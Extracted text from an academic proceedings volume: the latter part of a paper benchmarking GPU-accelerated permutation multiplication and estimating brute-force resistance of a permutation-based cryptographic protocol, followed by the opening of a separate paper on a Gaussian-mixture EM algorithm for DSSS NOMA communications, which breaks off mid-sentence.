shaders and floating-point support. These improvements allowed starting to use GPUs for different operations, which require math processing of a large amount of data. As described in the literature [17], the first attempts showed, that lower-upper factorization operation was given significant speed up using GPU over CPU. Those types of operations are called general-purpose computing on graphics processing units (GPGPU). Nowadays, there are mostly two separate companies that produce high-performance GPUs, that can be used for GPGPU, Nvidia, and AMD. Both of them have platforms, CUDA from Nvidia and ROCm from AMD. These platforms allow developers to easily use their hardware for GPGPU. We will use Nvidia CUDA in this study to increase operations on permutations. Nvidia’s CUDA platform allows GPUs to make general-purpose computing in parallel using hundreds and thousands of GPU cores. Such an approach drastically speeds up different algorithms, which process large blocks of data. Such processes are sorting, wavelet transformation, cryptography, molecular dynamics, machine learning, etc. Starting from Nvidia GeForce 8800, all Nvidia GPUs support CUDA API [18]. CUDA can be used with Microsoft Windows and different Linux distributions (Debian, CentOS, Ubuntu, etc.). Developers can use CUDA with such programming languages as C, C++, and Fortran. Also, third-party wrappers for other popular programming languages, such as Python or Java, are available. In the following, we will briefly describe the common Nvidia GPU architecture to show the concepts of GPGPU computing using the CUDA platform. We use the latest Nvidia architecture called Ampere, particularly the GA102 chip [19]. These specifics also apply to the past GPU generations as well. Typical Nvidia GPU (device) consists of Graphics Processing Clusters (GPC), Texture Processing Clusters (TPC), Steam Multiprocessors (SM), memory controllers, and other units. GA102 consists of 7 GPCs. Each GPC consists of 6 TPCs, and each of the TPC consists of 2 SMs. CUDA cores are part of SM and each SM has 128 CUDA cores (grouped by 4 processing blocks (partitions), each has 32 CUDA cores). So, in total, there are 10,752 CUDA cores in the GA102 chip. They can be used for GPGPU computing. All CUDA cores have computational units and registers that can perform different operations on both integers and floating points and have access to the device memory. Each CUDA core can load the data from the device memory to a register and perform backward operation relatively fast. This can be explained by the fast GPU memory and its interface (GDDR6X or HBM2 with bandwidth up to 2,039 GB/sec), including caches on the chip directly. GA102 chip, like any other common CUDA-enabled GPU, has a couple of different types of hardware memory available: registers (16,384 32-bit common registers for each partition in SM), L0 instruction cache (one for each partition), 128 KB L1 Data Cache (one for each SM), 6,144 KB of L2 cache (total, for all SMs), and device memory (GDDR or HBM). CUDA programming model makes available those memories to developers in the next form: registers (same as hardware registers), shared memory (part of L1 cache, can be reconfigured depending on the task), local memory (located in device memory), global memory (device memory), and constant memory (located in device memory and is cached in the constant cache). Different approaches that can use the described GPU hardware to increase the speed of cryptographic protocols are known. In the study [20], authors got a 20 times increase
6
A. Lavdanskyi et al.
of advanced encryption standard (AES) algorithm with the use of the CUDA platform. In the study [21], the authors implemented a high-performance signature server that realizes the elliptic curve digital signature algorithm (ECDSA) using GPU acceleration. In the study [22], the common techniques to implement and accelerate different block ciphers, available in OpenSSL cryptographic engine, using GPU are shown. The three-pass cryptographic protocol based on permutations [8] uses some operations on permutations. The protocol can be accelerated using SIMD instructions [9]. One of the most used operations on permutations in the protocol is permutation multiplication. This operation is used to calculate the values of Y1 − Y4 , keys σA and σB , to determine the message π . Here, we assume that Alice wants to transfer a message to Bob using three-pass cryptographic protocol [8]. In this case, Alice and Bob form the permutation α and calculate its decomposition into a product of disjoint cycles. These values are publicly available. Next, Alice generates her secret key s, the key permutation σA , and its inverse σA−1 . Bob generates his secret key r, the key permutation σB , and its inverse σB−1 . Additionally, Bob generates the permutation χB . These data are kept private by Alice and Bob separately. Alice maps the message m into a permutation π . Next, she calculates Y1 = σA · π and sends Y1 to Bob. Bob receives Y1 , calculates Y2 = σB · Y1 · χB , and sends it back to Alice. In turn, Alice calculates π −1 and the value of Y3 = σA−1 · Y2 · π −1 and sends Y3 back to Bob. At last, Bob calculates the value of Y4 = σB−1 · Y3 and converts it to a product of disjoint cycles. The initial permutation π can be found by calculating a group of multiplications Y1 · π −1 , where π is an assumed permutation, which is formed depending on Y4 disjoint cycles. After that, the initial message m can be restored. In total, about half of the operations on permutations performed in the protocol are multiplication operations. So accelerating permutation multiplication should give the greatest effect. In this study, we evaluate performance increase using modern GPUs. The product of permutations A and B of the length M is a permutation C = A · B, where C[i] = A[B[i]] and A[i], B[i], C[i] are the elements of permutations in position i, i ∈ [0; M − 1]. So, permutation multiplication is a transformation of one value in the memory to another value in the memory. This operation is fast and independent (each element in the permutation multiplication can be calculated independently from other elements), so it is ideal to run it in parallel. Nvidia GPUs have thousands of CUDA cores (compared to modern CPUs, which have tens of cores) with fast memory access, as described before, that can perform this operation extremely fast.
3 Experiments CUDA is used with a software development kit that allows programmers to use a C++ programming language to develop their applications. We create an algorithm that multiplies two permutations using different hardware, CPU (without SIMD instructions) and GPU (using CUDA). We compare the performance of CPU and GPU via Google Benchmark [23]. The length of permutations is fixed and set to 32,768 items. The test results are shown in Table 1.
Accelerating Operations on Permutations Using GPU
7
Table 1. Comparing the performance of one multiplication of two permutations Hardware
Multiplications per second
CPU (Ryzen 5 3600)
12466
GPU (GTX 1070)
3174
GPU (GTX 1650 GDDR6)
2756
Table 1 shows that the performance of permutation multiplication using GPU is much lower than when CPU is used. It seems that it should be the opposite because the GPU should give much more performance than the CPU in such tasks. This result is explained in terms of GPU architecture. GPU is a discrete hardware platform with its computational units and memory. GPU (device) is connected to the CPU (host) with some data bus. The data received from the user and calculated on the CPU and its memory (GPU cannot be used for general input-output operations, so we cannot use the GPU without CPU) should be moved to GPU (placed into its memory), processed, and transferred back to the CPU’s memory. The time of transferring all data to and from the GPU takes the most time, even if the direct multiplication of permutations takes a little time to complete (multiplication of two permutations, as in the experiment). To prove that, we use a profiling tool from Nvidia called nvprof, which can show the time spent for different phases of calculations. We use the previously created algorithm to perform the experiment. The nvprof utility shows, that about 55% of the time is spent copying the data from host memory to GPU memory. About 30% of the time is spent retrieving results from GPU memory to the host memory. And only about 15% of the time is spent to actually perform the multiplication of permutations. Here, we perform an experimental study of the performance of multiplication of a large number of permutations. A preset number of permutations is generated in the host memory and loaded into GPU’s memory at once. Then, multiple multiplications of permutations are performed. Consider that all permutations and multiplication results are stored in GPU memory during the multiplication process. After the multiplication procedure, all the results are moved back to the host memory, where they can be further processed. For the experiment, we use Nvidia GTX 1070 GPU which uses Pascal architecture and has 1,920 CUDA cores with 8 GB of GDDR5 memory. The results are shown in Table 2. We use the term “operation” to denote the multiplication of a group of permutations. For example, multiplying 100 permutations at once is an operation. An equivalent number of single permutation multiplications can be calculated by multiplying the number of permutation multiplications in operation by the number of operations per second performed.
4 Results The provided experiments show that the GPU performance depends on the number of permutation multiplications made at once. The results in Table 2 show that the multiplication of a set of permutations is much faster when the number of permutations is
8
A. Lavdanskyi et al. Table 2. The performance of multiple multiplications of permutations
Number of multiplications in operation
Operations per second
Equivalent number of single multiplications per second
1
3,174
3,174
2
3,174
6,348
5
2,987
14,935
10
2,869
28,690
20
2,354
47,080
50
1,706
85,300
100
1,220
122,000
200
746
149,200
500
346
173,000
1,000
188
188,000
2,000
93
186,000
3,000
62
186,000
increased. GPU performance exceeds CPU performance starting from 5 permutations at a time. As it is shown in the literature [9], it is possible to enhance CPU’s permutation multiplications performance using SIMD instructions by a value of about 2.5. Even in this case, using GPU is much more effective to perform such operations. A lot of permutation multiplications performed at once on GPU can be used in such tasks as brute-force attacks. A cryptanalyst needs to load operands (permutation pairs to be multiplied) to the GPU’s memory, perform multiple multiplications in parallel, and retrieve all results to check if the protocol key was found. The other situation can also get the speed increase. It is the server in the data center that serves many clients using a cryptographic protocol. Tasks from different clients can be grouped and sent to the GPU to perform multiplications. In that case, all transfers between memories and permutation multiplications will be made at once, which will give the maximum performance. According to [8], secret keys s and r have the form of vector s = s1 , s2 , . . . , sn(α) , where 0 ≤ si ≤ l(αi ) − 1, l(αi ) is the order of the cycle αi in the decomposition n(α) into a product of disjoint cycles α = i=1 αi . The values of s and r are used to n(α) n(α) generate key permutations σA = i=1 αisi and σB = i=1 αiri . Thus, if the cryptanalyst wants to perform a brute-force attack and find a key permutation, he must go through all the possible values of si and calculate the value of σ for each set of the vector s1 , s2 , . . . , sn(α) (the number of possible vectors is equal to n(α) i=1 l(αi )). Here, we calculate the equivalent key permutation length for the key length of modern ciphers, which are 128, 192, or 256 bits. To perform a brute-force attack, the cryptanalyst must iterate over all possible keys, the number of which is equal to 2k , where k is a key length. Now, we compare the number of possible key values to find the equivalent structure of α with a minimum possible permutation length. Here, we assume that l(αi ) =
Accelerating Operations on Permutations Using GPU
9
l(αj ), ∀i, j. Then, the number of possible values of key σ is equal to l(α)n(α) . The length of key σ , that will be equal to the key length of modern ciphers, must meet the inequality l(α)n(α) ≥ 2k . In other words, we need to find n(α) = logl(α) 2k for each key length k ∈ {128, 192, 256}. The results are shown in Table 3. Table 3. Equivalent α structures for different key lengths Alpha Alpha Alpha Alpha Alpha Alpha Alpha Alpha Alpha cycles cycles permutation cycles cycles permutation cycles cycles permutation length number length length number length length number length 2128
2192
2256
3
81
243
3
122
366
3
162
486
4
64
256
4
96
384
4
128
512
5
56
280
5
83
415
5
111
555
6
50
300
6
75
450
6
100
600
7
46
322
7
69
483
7
92
644
8
43
344
8
64
512
8
86
688
9
41
369
9
61
549
9
81
729
10
39
390
10
58
580
10
78
780
The minimum suitable α length is 243 elements for key length k = 128, 366 elements for key length k = 192, and 486 elements for key length k = 256 (when l(αi ) = 3). Let l(αi ) = 3, nα = 81. To perform a brute-force attack, the cryptanalyst must create 381 vectors s. The minimum number of 81 permutation multiplications must be made to calculate the vector s and to find the value of σA . Therefore, the number of permutations needed to find the key permutation σA is equal to 81 · 381 . 81·381 According to the performance results from Table 2, it will take up to 188000 ≈ 35 1.91 · 10 seconds for the cryptanalyst to find a key σA (using GTX1070 GPU), which is a significant value. The results of the experiments show that the performance of permutation multiplication using GPU begins to exceed the performance of a similar operation on the CPU starting with 5 parallel multiplications, reaching a value of about 14,900 multiplications per second. Maximum performance is achieved by 1,000 parallel multiplications (about 188,000 multiplications per second). The performance increases until a balance between copying to/from GPU memory and multiplication operation is reached. The brute-force attack on keys will take enormous time if transformation parameters of the three-pass cryptographic protocol based on permutations are chosen properly.
5 Discussion According to Table 1, there is no increase in performance when using the GPU over the CPU for individual multiplication of permutations which can be explained by the GPU architecture. The performance gain can be achieved when multiple multiplications of
10
A. Lavdanskyi et al.
permutations are made at once, as it is shown in Table 2. Table 3 shows corresponding values of α length, which allow to make assumptions (relying on calculated time expectations) that it is extremely difficult to find the key permutation for the threepass cryptographic protocol based on permutations using specialized hardware when the length of α is more than 243 elements. The proposed approach also can be used in other areas related to factorial coding, such as [24–27]. Note that a cryptanalyst can use a more powerful GPU to perform an attack. The performance of permutation multiplications can be further increased by using modern GPUs, such as the Nvidia RTX series, which has up to 10,752 CUDA cores and even faster GDDR6X memory with higher bandwidth. Moreover, a couple of GPUs can be used in parallel to execute permutation multiplications. Such an approach can increase overall performance by an order of magnitude, but still, the time needed to brute-force keys is essential. Another way that can be used to further increase the performance of the threepass cryptographic protocol based on permutations is the use of a field-programmable gate array (FPGA). FPGA allows the creation of various hardware blocks that perform intensive computation tasks and can help to implement the cryptographic protocol in hardware completely. The different approaches to cryptoprotocols implementation using FPGA are shown in the literature [28–32].
6 Conclusions The results of the study show that using a GPU instead of a CPU to multiply only several permutations in parallel is not effective. At the same time, the use of GPU can significantly speed up the multiplication operation of a large number of permutation pairs, achieving for 1,000 parallel multiplications a 15-fold increase in performance relative to CPU multiplication. Thus, the use of the CUDA platform allows to more accurately assess the strength of the three-pass cryptographic protocol based on permutations due to brute-force attack and set the appropriate transformation parameters. The minimum appropriate α length is 243 elements with a cycles structure equal to 3 × 81 for k = 128, 366 elements with a cycles structure equal to 3 × 122 for k = 196, and 486 elements with a cycles structure equal to 3 × 162 for k = 256. Acknowledgements. This research was funded from the Ministry of Education and Science of Ukraine under grant 0120U102607.
References 1. Bassham, L.E., et al.: A statistical test suite for random and pseudorandom number generators for cryptographic applications. National Institute of Standards and Technology, Gaithersburg, MD, NIST SP 800-22r1a (2010). https://doi.org/10.6028/NIST.SP.800-22r1a 2. The Marsaglia Random Number CDROM Including the Diehard Battery of Tests. http://stat. fsu.edu/pub/diehard/
Accelerating Operations on Permutations Using GPU
11
3. Faure, E., Myronets, I., Lavdanskyi, A.: Autocorrelation criterion for quality assessment of random number sequences. CEUR Workshop Proc. 2608, 675–689 (2020). https://doi.org/ 10.32782/cmis/2608-52 4. Faure, E.V., Shcherba, A.I., Rudnytskyi, V.M.: The method and criterion for quality assessment of random number sequences. Cybern. Syst. Anal. 52(2), 277–284 (2016). https://doi. org/10.1007/s10559-016-9824-3 5. L’Ecuyer, P., Simard, R.: TestU01: a C library for empirical testing of random number generators. ACM Trans. Math. Softw. (TOMS) 33(4), 22 (2007) 6. Yang, X.-W., Zhan, X.-Q., Kang, H.-J., Luo, Y.: Fast software implementation of serial test and approximate entropy test of binary sequence. Secur. Commun. Netw. 2021 (2021). https:// doi.org/10.1155/2021/1375954 7. Luengo, E.A., Villalba, L.J.G.: Recommendations on statistical randomness test batteries for cryptographic purposes. ACM Comput. Surv. 54(4) (2021). https://doi.org/10.1145/3447773 8. Shcherba, A., Faure, E., Lavdanska, O.: Three-pass cryptographic protocol based on permutations. In: 2020 IEEE 2nd International Conference on Advanced Trends in Information Theory (ATIT), pp. 281–284 (2020). https://doi.org/10.1109/ATIT50783.2020.9349343 9. Lavdanskyi, A.O., Faure, E.V., Shcherba, V.O.: Increasing the speed of the permutations multiplication operation due to use of SIMD instructions. Visnyk Cherkaskogo derzhavnogo tehnologichnogo universitetu 3, 36–43 (2021). https://doi.org/10.24025/2306-4412.3.2021. 245347 10. Lopresti, M., Piccoli, F., Reyes, N.: GPU permutation index: good trade-off between efficiency and results quality. In: Pesado, P., Gil, G. (eds.) CACIC 2021. CCIS, vol. 1584, pp. 183–200. Springer, Cham (2022). https://doi.org/10.1007/978-3-031-05903-2_13 11. Pessoa, T.C., Gmys, J., Melab, N., de Carvalho Junior, F.H., Tuyttens, D.: A GPU-based backtracking algorithm for permutation combinatorial problems. In: Carretero, J., GarciaBlas, J., Ko, R.K.L., Mueller, P., Nakano, K. (eds.) ICA3PP 2016. LNCS, vol. 10048, pp. 310– 324. Springer, Cham (2016). https://doi.org/10.1007/978-3-319-49583-5_24 12. Gmys, J.: Optimal solving of permutation-based optimization problems on heterogeneous CPU/GPU clusters. In: Proceedings - 2018 International Conference on High Performance Computing and Simulation (HPCS), pp. 799–801 (2018). https://doi.org/10.1109/HPCS. 2018.00129 13. Kruliš, M., Osipyan, H., Marchand-Maillet, S.: Employing GPU architectures for permutation-based indexing. Multimed. Tools Appl. 76(9), 11859–11887 (2016). https://doi. org/10.1007/s11042-016-3677-7 14. Hayakawa, H., Ishida, N., Murao, H.: GPU-acceleration of optimal permutation-puzzle solving. In: ACM International Conference Proceeding Series, vol. 10, pp. 61–69 (2015). https:// doi.org/10.1145/2790282.2790289 15. Harju, A., Siro, T., Canova, F.F., Hakala, S., Rantalaiho, T.: Computational physics on graphics processing units. In: Manninen, P., Öster, P. (eds.) PARA 2012. LNCS, vol. 7782, pp. 3–26. Springer, Heidelberg (2013). https://doi.org/10.1007/978-3-642-36803-5_1 16. Lupescu, G., Gheorghe, L., Tapus, N.: Commodity hardware performance in AES processing. In: Proceedings - IEEE 13th International Symposium on Parallel and Distributed Computing (ISPDC), pp. 82–86 (2014). https://doi.org/10.1109/ISPDC.2014.14 17. Du, P., Weber, R., Luszczek, P., Tomov, S., Peterson, G., Dongarra, J.: From CUDA to OpenCL: towards a performance-portable solution for multi-platform GPU programming. Parallel Comput. 38(8), 391–407 (2012). https://doi.org/10.1016/j.parco.2011.10.002 18. CUDA GPUs|NVIDIA Developer. https://developer.nvidia.com/cuda-gpus 19. NVIDIA Ampere GA102 GPU Architecture. https://images.nvidia.com/aem-dam/en-zz/Sol utions/geforce/ampere/pdf/NVIDIA-ampere-GA102-GPU-Architecture-Whitepaper-V1.pdf
12
A. Lavdanskyi et al.
20. Manavski, S.A.: CUDA compatible GPU as an efficient hardware accelerator for AES cryptography. In: 2007 IEEE International Conference on Signal Processing and Communications, pp. 65–68 (2007). https://doi.org/10.1109/ICSPC.2007.4728256 21. Pan, W., Zheng, F., Zhao, Y., Zhu, W.-T., Jing, J.: An efficient elliptic curve cryptography signature server with GPU acceleration. IEEE Trans. Inf. Forensics Secur. 12(1), 111–122 (2017). https://doi.org/10.1109/TIFS.2016.2603974 22. Gilger, J., Barnickel, J., Meyer, U.: GPU-acceleration of block ciphers in the OpenSSL cryptographic library. In: Gollmann, D., Freiling, F.C. (eds.) ISC 2012. LNCS, vol. 7483, pp. 338–353. Springer, Heidelberg (2012). https://doi.org/10.1007/978-3-642-33383-5_21 23. Google/Benchmark: A microbenchmark support library. https://github.com/google/ben chmark 24. Faure, E., Shcherba, A., Vasiliu, Y., Fesenko, A.: Cryptographic key exchange method for data factorial coding, vol. 2654, p. 643 (2020) 25. Al-Azzeh, J.S., Ayyoub, B., Faure, E., Shvydkyi, V., Kharin, O., Lavdanskyi, A.: Telecommunication systems with multiple access based on data factorial coding. Int. J. Commun. Antenna Propag. (IRECAP) 10(2), 102 (2020). https://doi.org/10.15866/irecap.v10i2.17216 26. Faure, E., Shcherba, A., Stupka, B.: Permutation-based frame synchronisation method for short packet communication systems. In: 2021 11th IEEE International Conference on Intelligent Data Acquisition and Advanced Computing Systems: Technology and Applications (IDAACS), pp. 1073–1077. Cracow, Poland (2021). https://doi.org/10.1109/IDAACS53288. 2021.9660996 27. Al-Azzeh, J., Faure, E., Shcherba, A., Stupka, B.: Permutation-based frame synchronization method for data transmission systems with short packets. Egypt. Inform. J. (2022). https:// doi.org/10.1016/j.eij.2022.05.005 28. Umer, U., Rashid, M., Alharbi, A.R., Alhomoud, A., Kumar, H., Jafri, A.R.: An efficient crypto processor architecture for side-channel resistant binary huff curves on FPGA. Electronics (Switzerland) 11(7) (2022). https://doi.org/10.3390/electronics11071131 29. Leelavathi, G., Shaila, K., Venugopal, K.R.: Implementation of public key crypto processor with probabilistic encryption on FPGA for nodes in wireless sensor networks. In: 2018 9th International Conference on Computing, Communication and Networking Technologies (ICCCNT) (2018). https://doi.org/10.1109/ICCCNT.2018.8493894 30. Kashif, M., Ç˙iÇek, I.: Field-programmable gate array (FPGA) hardware design and implementation of a new area efficient elliptic curve crypto-processor. Turk. J. Electr. Eng. Comput. Sci. 29(4), 2127 (2021). https://doi.org/10.3906/ELK-2008-8 31. Gnanasekaran, L., Eddin, A.S., El Naga, H., El-Hadedy, M.: Efficient RSA crypto processor using Montgomery multiplier in FPGA. In: Arai, K., Bhatia, R., Kapoor, S. (eds.) FTC 2019. AISC, vol. 1070, pp. 379–389. Springer, Cham (2020). https://doi.org/10.1007/978-3-03032523-7_26 32. Doan, T.P., Ganesan, S.: CAN crypto FPGA chip to secure data transmitted through CAN FD bus using AES-128 and SHA-1 algorithms with a symmetric key. SAE Technical Paper. 2017-01-1612 (2017). https://doi.org/10.4271/2017-01-1612
Machine Learning Technique Based on Gaussian Mixture Model for Environment Friendly Communications Oleksii Holubnychyi(B) , Yevhen Gabrousenko, Anatolii Taranenko, Olexandr Slobodian, and Olena Zharova National Aviation University, Kyiv, Ukraine [email protected]
Abstract. A machine learning technique, which is based on the Gaussian mixture model and uses a developed parametric and criteria features modification of the expectation-maximization (EM) algorithm with removing components of the Gaussian mixture model for a deep statistical analysis of cross-correlations between code structures in low power environment friendly direct sequence spread spectrum (DSSS) non-orthogonal multiple access (NOMA) communications, is proposed in the paper. The features of the EM-algorithm for this purpose are described and analyzed. The proposed modification of the EM-algorithm contains the justification of the initial number of components of a mixture, the initial model parameters, and three additional clustering criteria for adjusting the procedures of EM-algorithm under conditions of mathematical singularities in the log-likelihood function. An example of working of the proposed technique for DSSS NOMA communications is presented and analyzed. Keywords: Low power communications · DSSS · NOMA · machine learning · Gaussian mixture model · EM-algorithm · sustainable development
1 Introduction Machine learning techniques, methods, and algorithms for data and signal processing are able to provide an opportunity to classify data and signal structures (e.g., cluster analysis [1, 2]), to predict processes (e.g., regression models [3–5]), to analyze structures and interlinkages between their parts and processes (e.g., hidden Markov model [6–8]), and solve other problems in different areas, including applied mathematics and engineering, as for example designing of mobile underwater acoustic sensor networks [2], traffic prediction of real wireless network [3], roadside estimation of a vehicle’s center of gravity height [4], rain attenuation prediction for terrestrial links [5], subsurface flow path modeling from inertial measurement unit sensor data [7], land cover classification using multitemporal satellite images [8]. An important feature of above-mentioned machine learning techniques and approaches is a partial or complete automation, which boils down to unsupervised character of a robust data or signal processing using only input data or signals to be analyzed. © The Author(s), under exclusive license to Springer Nature Switzerland AG 2023 E. Faure et al. (Eds.): ITEST 2022, LNDECT 178, pp. 13–29, 2023. https://doi.org/10.1007/978-3-031-35467-0_2
14
O. Holubnychyi et al.
The features of machine learning techniques and approaches make them also promising for achieving the Sustainable Development Goals (SDGs), also known as the Global Goals, which were adopted by the United Nations in 2015 as a universal call to action to end poverty, protect the planet, and ensure that by 2030 all people enjoy peace and prosperity [9]. Among 17 SDGs, environment friendly communications, in particular safe and effective microwave radio links, mobile communications, and wireless cellular networks, are directly related to both the goal 9 “Industry, innovation and infrastructure” (with respect to the new information and communication technologies), and also the goal 11 “Sustainable cities and communities” (with respect to a safe housing under the rapid growth of cities) [9]. A solution of various problems, which are related to these goals with respect to the new information and communication technologies, can be found in particular in the fields of low power communications, such as the wireless long distance and low power networks (LPWAN), and the LoRa (Long Range) protocol [10], cognitive radio and modern intelligent radio concepts [11], spread spectrum communications, especially direct sequence spread spectrum (DSSS) technology combined with PSK modulation [12], which are often interrelated within one radio system, e.g., in some modern IoT radio links [13]. The paper is directly focused on the part of information and communication technologies that deal with machine learning based signal processing techniques for the physical layer of low power DSSS communications, which can also be combined with nonorthogonal signal and code structures, e.g., in reconfigurable intelligent surface (RIS)assisted multi-user non-orthogonal multiple access (NOMA) communications [14]. For this kind of communications the problem, in particular, boils down to a deep analysis of the non-orthogonal structures (e.g., based some kinds of complementary sequences [15–17]) during code or waveform generation and further data or signal processing, to improve the efficiency of data transfer and processing. In this regard, taking into account the machine learning approach, the aim of the paper is to propose the modification (parametric and criteria features) of the expectation-maximization (EM) algorithm with removing components of the Gaussian mixture model and additional clustering criteria for a deep statistical analysis of cross-correlations between code structures in low power environment friendly DSSS NOMA communications. The rest of the paper is organized as follows: Sect. 2 presents materials and methods, including a deep statistical analysis of cross-correlations between code structures based on Gaussian mixture model for environment friendly DSSS NOMA communications using a proposed parametric and criteria features based modification of the EM-algorithm with removing components of the Gaussian mixture model, Sect. 3 contains experiments, which boil down to an example of the use of a proposed technique, simulation results are presented in Sect. 4, Sect. 5 presents discussion, including a practical significance of the results, and, finally, Sect. 6 describes conclusions.
2 Materials and Methods Let us describe a proposed deep statistical analysis of cross-correlations between code structures based on Gaussian mixture model for environment friendly DSSS NOMA communications.
Machine Learning Technique Based on Gaussian Mixture Model
15
For a mixture of estimated unique and informative cross-correlations(i.e. above or below the main diagonal of the correlation matrix for code structures) r = r˜j , j = 1, D, D = Q(Q − 1)/2 is the number of elements above or below the main diagonal of the correlation matrix, Q is the number of code structures in DSSS NOMA communication system, the Gaussian mixture model [18, 19] can be expressed as K K θk (˜r − μk )2 2 θk N r˜ ; μk , σk = , (1) p(˜r ) = √ exp − k=1 k=1 σ 2σk2 k 2π where p(˜r ) is the probability density function of r˜ ; K is the number of
of components a mixture, which is presented by the Gaussian mixture model; N r˜ ; μk , σk2 is the k-th Gaussian component (distribution) with the mean μk and the variance σk2 , which is part of the mixture p(˜r ); θk is the weighting factor of the k-th Gaussian component in the mixture p(˜r ), which may be taken for a probability of that the random value r˜ belongs to the k-th Gaussian component N r˜ ; μk , σk2 . The values of the weighting factors θk , k = 1, K, in (1) are normalized in such a way that K θk = 1. (2) k=1
During a statistical analysis of r using the Gaussian mixture model, the vector of parameters (3) of the model (1) is subject to evaluation, taking (2) into account: ω = {θ, μ, σ} = {θ1 , . . . , θK , μ1 , . . . , μK , σ1 , . . . , σK }.
(3)
It should, however, be noted that the vector ω is a non-core result of analysis in the proposed machine learning technique. The main product
ofanalysis are the values of hidden variables of the Gaussian mixture model γ = γj,k , j = 1, D, k = 1, K, which are the posterior probabilities that r˜j belongs to the k-th Gaussian component of a mixture (cluster), and γ is defined using ω. Let us propose a parametric and criteria features based modification of the EMalgorithm with removing components of the Gaussian mixture model for estimation of ω and γ during the deep statistical analysis of cross-correlations between code structures in DSSS NOMA communications. A developing of the modification is also needed to take into account features and restrictions of a standard realization of the EM-algorithm [20–22], which implements a maximum likelihood estimation method that maximizes the log-likelihood function L(ω| r) for the hypothesis about parameters ω with observed data r, containing D elements (cross-correlations between codes)
2 K D
D r˜j − μk θk p r˜j |ω = ln . (4) L(ω| r) = ln √ exp − j=1 j=1 k=1 σ 2σk2 k 2π The parameter estimates of components of the Gaussian mixture model, which can r). be obtained using (4), are ω = argmax L(ω| ω The EM-algorithm at its core consists of iterative procedures up the convergence of the log-likelihood function L(ω| r) to its maximum value, and contains two steps at each iteration [20, 21]:
16
O. Holubnychyi et al.
Expectation step (E-step) at which the values of hidden variables of the Gaussian s−1 s−1 mixture model γ , j = 1, D, k = 1, K, are estimated using (5) at the s-th = γj,k iteration (starting with s = 1) through a current approximation of the model parameters ωs−1 = θs−1 , μs−1 , σs−1 s−1 s−1 s−1 s−1 s−1 s−1 . , . . . , θK , μ1 , . . . , μK , σ1 , . . . , σK = θ1
s−1 2 r˜j −μk exp − s−1 2 s−1 √ σk 2π 2 σk . s−1 2 s−1 r˜j −μl K θl l=1 σs−1 √2π exp − s−1 2 2 σl l s−1
θk
s−1
γj,k
=
(5)
s−1
, which belong to the k-th component At the E-step, the number of elements Dk of a mixture, is also evaluated using (6). D s−1 s−1 = γj,k . (6) Dk j=1
Maximization step parameters ωs = (M-step) at which new estimates of the model s s s s s s θs , μs , σs = θ1 , . . . , θK , μ1 , . . . , μK , σ1 , . . . , σK are estimated using (7) that at the current s-th iteration maximize L(ω| r)
s
s−1
θk = 1
s
μk = s
σk
=
Dk ; D D s−1 γj,k r˜j ;
s−1 Dk D
1
s−1
Dk
j=1
s−1
γj,k
(7)
s 2 r˜j − μk .
j=1
criterion for the EM-algorithm can be based on the condition
The stopping r − L ωs−1 | r < ε, where ε is a positive number, whereby a current accuL ωs | racy of estimation of the model parameters can be considered suitable. The estimated parameters of the Gaussian mixture model (1) are ω = ωsmax . The EM-algorithm and its modifications are used for estimating the parameters of components of mixtures, which are presented in a form of Gaussian mixture models and represent data to be analyzed in different applications. The algorithm also allows a clustering of objects, which are elements of data to be analyzed, using obtained posterior probabilities of that a taken object belongs to some clusters (components of a Gaussian mixture model), but its standard realization is characterized by features that can limit its use: 1. Sensitivity to initial parameters ω0 = θ0 , μ0 , σ0 , which can cause a solution in local extrema of the log-likelihood function L(ω| r), which is maximizing during iterative procedures of the EM-algorithm.
Machine Learning Technique Based on Gaussian Mixture Model
17
2. A priori uncertainty about the number of components of a mixture K in different practical problems, e.g., if a clustering problem is characterized by a priori uncertainty about the number of clusters. 3. The need to introduce and use additional criteria for adding or removing components (clusters) in modifications of the EM-algorithm with adding or removing of components that influences the values of probabilities of errors of the first and second genus during clustering. 4. The need to take into account the specific nature of the problem (i.e. context, physical meaning, etc.) for a correct interpretation of obtained solutions. 5. Possible occurrence of singularities (indeterminate forms) during iterative procedures of the EM-algorithm, which are subject to disclosure and contextual explanation, taking into account the specific nature of the problem, in order to provide a correct continuation of iterative procedures of the EM-algorithm in these conditions. The content of a parametric and criteria features based modification of the EMalgorithm with removing components of the Gaussian mixture model, which is proposed in the paper, boils down to: 1. Justification of the structural parameter K and its variability. 2. Justification of the initial model parameters ω0 = θ0 , μ0 , σ0 . 3. Introducing and justification of additional clustering criteria for adjusting the procedures of EM-algorithm under conditions of mathematical singularities in the loglikelihood function L(ω| r), as well as taking into account the peculiarities of the context of element clustering. 2.1 Justification of the Structural Parameter K and Its Variability Despite the fact that the EM-algorithm is generally known method for estimating the parameters of distributions, which form a mixture, and clustering, one of the main problems in its practical use is a priori uncertainty about the number of components (clusters) K, which is a structural parameter of this algorithm. There are known modifications of the EM-algorithm with adding [22] or removing of components [19]. The choice of modification of the EM-algorithm significantly depends on the problem of a deep statistical analysis of cross-correlations between code structures in low power environment friendly DSSS NOMA communications, which can be characterized by an important feature: the number of elements in the mixture r to be analyzed and clustered in some cases can be small (D ∼ 10 . . . 100), which is a small enough to select some Gaussian components, even if they are present in an observed sample of the mixture. In order to sufficiently describe one, e.g. k-th, Gaussian component, it is necessary to have in a mixture at least Dk 10 elements, which belong to this component, depending on its parameters μk and σk2 . Therefore, the use of approaches to the modification of the EM-algorithm, which are characterized by an adding of components, leads to the fact that a significant number or all elements of a mixture are identified with the same component (it depends also on the initial model parameters ω0 ), because one or two initial components during clustering can act as “attractors” of all elements of the mixture with a small sample size D. In this case a process of adding components is significantly complicated by the need for more complex justification of the criterion
18
O. Holubnychyi et al.
of adding of new components, which can be based on the rule ∀k ∈ 1, K, γj,k < γ0 where γ0 is the threshold value of the a posteriori probability of that r˜j belongs to a some component of the current existing K components of the mixture. In turn, there is a problem of choosing the threshold γ0 , which influences the values of probabilities of errors of the first and second genus during clustering. Therefore, for modifying the EM-algorithm according to the problem of a deep statistical analysis of cross-correlations between code structures in DSSS NOMA communications, an approach that boils down to removing components of the Gaussian mixture model has been chosen. In doing so, the modification would be characterized by the structural parameter Kmax , which is the initial maximum possible number of components in the model. Given that the data r, which are cross-correlations between code structures, is the subject of analysis, it would be possible to choose the maximum possible number of components of the mixture Kmax = D. However, clustering in this case, depending on the initial model parameters ω0 , can be reduced to the fact that there are D clusters, each of which contains one or more (if their values are the same) cross-correlation coefficients r˜j , j = 1, D. There will also be a number of empty clusters, as Kmax = D, and some cluster will contain more than one object. The content and interpretation of such clustering are trivial and show only that any two different code structures are in some way correlated with each other, which is a priori known, or several different code structures are correlated in pairs in the same way with the same 